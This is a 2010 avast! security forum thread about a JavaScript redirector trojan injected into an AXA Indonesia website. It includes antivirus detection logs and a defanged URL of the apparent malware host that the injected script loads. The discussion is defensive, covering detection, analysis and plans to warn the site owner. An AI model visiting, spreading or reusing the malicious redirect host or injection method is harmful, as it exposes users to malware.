Author Topic: AXA Financial Website was injected with JS:Illredir-CB [Trj]  (Read 4795 times)

Offline Yanto.Chiang

  • avast! Evangelist
  • Super Poster
  • ***
  • Posts: 1338
  • Gender: Male
  • Soli Deo Gloria
    • Dawood Technology
    • Personal Message (Offline)
Dear All,

I just got information from my friend that one of biggest financial provider AXA Financial, their website was injected with JS:Illredir-CB [Trj].
avast! was detected there is 3 location was infected :

avast! [YANTOCHIANG-PC]: File "http://wxw.axa.co.id/DropDownMenuX.js" is infected by "JS:Illredir-CB [Trj]" virus.
"%3" task used
Version of current VPS file is 100607-2, 06/08/2010

avast! [YANTOCHIANG-PC]: File "http://wxw.axa.co.id/ie5.js" is infected by "JS:Illredir-CB [Trj]" virus.
"%3" task used
Version of current VPS file is 100607-2, 06/08/2010

avast! [YANTOCHIANG-PC]: File "http://wxw.axa.co.id/" is infected by "JS:Illredir-CB [Trj]" virus.
"%3" task used
Version of current VPS file is 100607-2, 06/08/2010

And from the summary website scanning tool, this website got suspicious category :

http://www.unmaskparasites.com/security-report/


I need to know where is the exactly location at their HTML script was injected?


« Last Edit: June 08, 2010, 01:07:02 PM by Yanto.Chiang »
Yanto Chiang | John 3:30 He must increase, but I must decrease.

Offline Pondus

  • avast! Überevangelist
  • Maybe Bot
  • *****
  • Posts: 21781
  • Gender: Male
    • Personal Message (Offline)
« Last Edit: June 08, 2010, 09:23:12 AM by Pondus »
Chief Wiggum: Uh, no, you got the wrong number. This is 9-1…2.


Offline Yanto.Chiang

  • avast! Evangelist
  • Super Poster
  • ***
  • Posts: 1338
  • Gender: Male
  • Soli Deo Gloria
    • Dawood Technology
    • Personal Message (Offline)
Re: AXA Financial Website was injected with JS:Illredir-CB [Trj]
« Reply #2 on: June 08, 2010, 05:41:12 AM »
This page seems to be <suspicious>    1 suspicious inline script found.
http://www.UnmaskParasites.com/security-report/?page=www.axa.co.id

Hi Pondus,

Yes you are rite, i just would like to know which part of this website was injected with the script.

cheers,
Yanto Chiang | John 3:30 He must increase, but I must decrease.

Offline Pondus

  • avast! Überevangelist
  • Maybe Bot
  • *****
  • Posts: 21781
  • Gender: Male
    • Personal Message (Offline)
Re: AXA Financial Website was injected with JS:Illredir-CB [Trj]
« Reply #3 on: June 08, 2010, 05:43:38 AM »
not sure, but DavidR or Polonus will tell you when they arrive
Chief Wiggum: Uh, no, you got the wrong number. This is 9-1…2.


Offline Yanto.Chiang

  • avast! Evangelist
  • Super Poster
  • ***
  • Posts: 1338
  • Gender: Male
  • Soli Deo Gloria
    • Dawood Technology
    • Personal Message (Offline)
Re: AXA Financial Website was injected with JS:Illredir-CB [Trj]
« Reply #4 on: June 08, 2010, 05:50:36 AM »
not sure, but DavidR or Polonus will tell you when they arrive

Hi Pondus,

Thanks for your kindly advice,

I need this because if i can contact their web administrator it would be helpful for them.

Since they are core business in financial transaction, i am afraid it would be harmful for other client which related with AXA Financial.

cheers,
Yanto Chiang | John 3:30 He must increase, but I must decrease.

Offline Yanto.Chiang

  • avast! Evangelist
  • Super Poster
  • ***
  • Posts: 1338
  • Gender: Male
  • Soli Deo Gloria
    • Dawood Technology
    • Personal Message (Offline)
Re: AXA Financial Website was injected with JS:Illredir-CB [Trj]
« Reply #5 on: June 08, 2010, 07:18:20 AM »

According to Wepawet, at this website found nothing harmful script :

http://wepawet.iseclab.org/view.php?hash=040f6e2c7a680c8297f10b249fd9a01d&t=1275980714&type=js

Yanto Chiang | John 3:30 He must increase, but I must decrease.

Offline kubecj

  • Administrator
  • Advanced Poster
  • ***
  • Posts: 1127
  • Gender: Male
    • ALWIL Software
    • Personal Message (Offline)
Re: AXA Financial Website was injected with JS:Illredir-CB [Trj]
« Reply #6 on: June 08, 2010, 10:08:48 AM »
Definitely malware redirector. Wepawet does even find the russian link, but it's down.
Jindrich Kubec

Offline Yanto.Chiang

  • avast! Evangelist
  • Super Poster
  • ***
  • Posts: 1338
  • Gender: Male
  • Soli Deo Gloria
    • Dawood Technology
    • Personal Message (Offline)
Re: AXA Financial Website was injected with JS:Illredir-CB [Trj]
« Reply #7 on: June 08, 2010, 12:11:52 PM »
Hi Kubejc,

Thanks for your kindly information and advice.

cheers,
Yanto Chiang | John 3:30 He must increase, but I must decrease.

Online polonus

  • avast! Überevangelist
  • Maybe Bot
  • *****
  • Posts: 20165
  • Gender: Male
  • malware fighter
    • Personal Message (Online)
Re: AXA Financial Website was injected with JS:Illredir-CB [Trj]
« Reply #8 on: June 08, 2010, 12:48:27 PM »
Hi YantoChiang,

Make the links in your first posting so they cannot be clicked through, suspicious links should be written with wxw or htxp so the curious cannot click them and get themselves infested with malware.

If you analyze there, as kubecj pointed out to us, you would get a drop-down from here: wXw.axa.co.id/DropDownMenuX.js
to CreateElement here:  hxtp://surechip.ru:8080/google.com/google.co.ve/digitalpoint.com.php
Empty source - Could not connect to site?

polonus
« Last Edit: June 08, 2010, 05:59:34 PM by polonus »
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

Offline Yanto.Chiang

  • avast! Evangelist
  • Super Poster
  • ***
  • Posts: 1338
  • Gender: Male
  • Soli Deo Gloria
    • Dawood Technology
    • Personal Message (Offline)
Re: AXA Financial Website was injected with JS:Illredir-CB [Trj]
« Reply #9 on: June 08, 2010, 01:08:27 PM »
Hi Polonus,

I am sorry for inconvenience causes, but i already fixed it.

By the way, do you know how to trace the location of those scripts?

Yanto Chiang | John 3:30 He must increase, but I must decrease.

Online polonus

  • avast! Überevangelist
  • Maybe Bot
  • *****
  • Posts: 20165
  • Gender: Male
  • malware fighter
    • Personal Message (Online)
Re: AXA Financial Website was injected with JS:Illredir-CB [Trj]
« Reply #10 on: June 08, 2010, 06:17:08 PM »
Hi Yanto.Chiang,

I PM-ed you with extensive instructions how to do this safely and securely,
good hunt,

polonus
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

 

Google Chrome

AVAST recommends using the FREE Google Chrome™ browser.

Download Google Chrome Now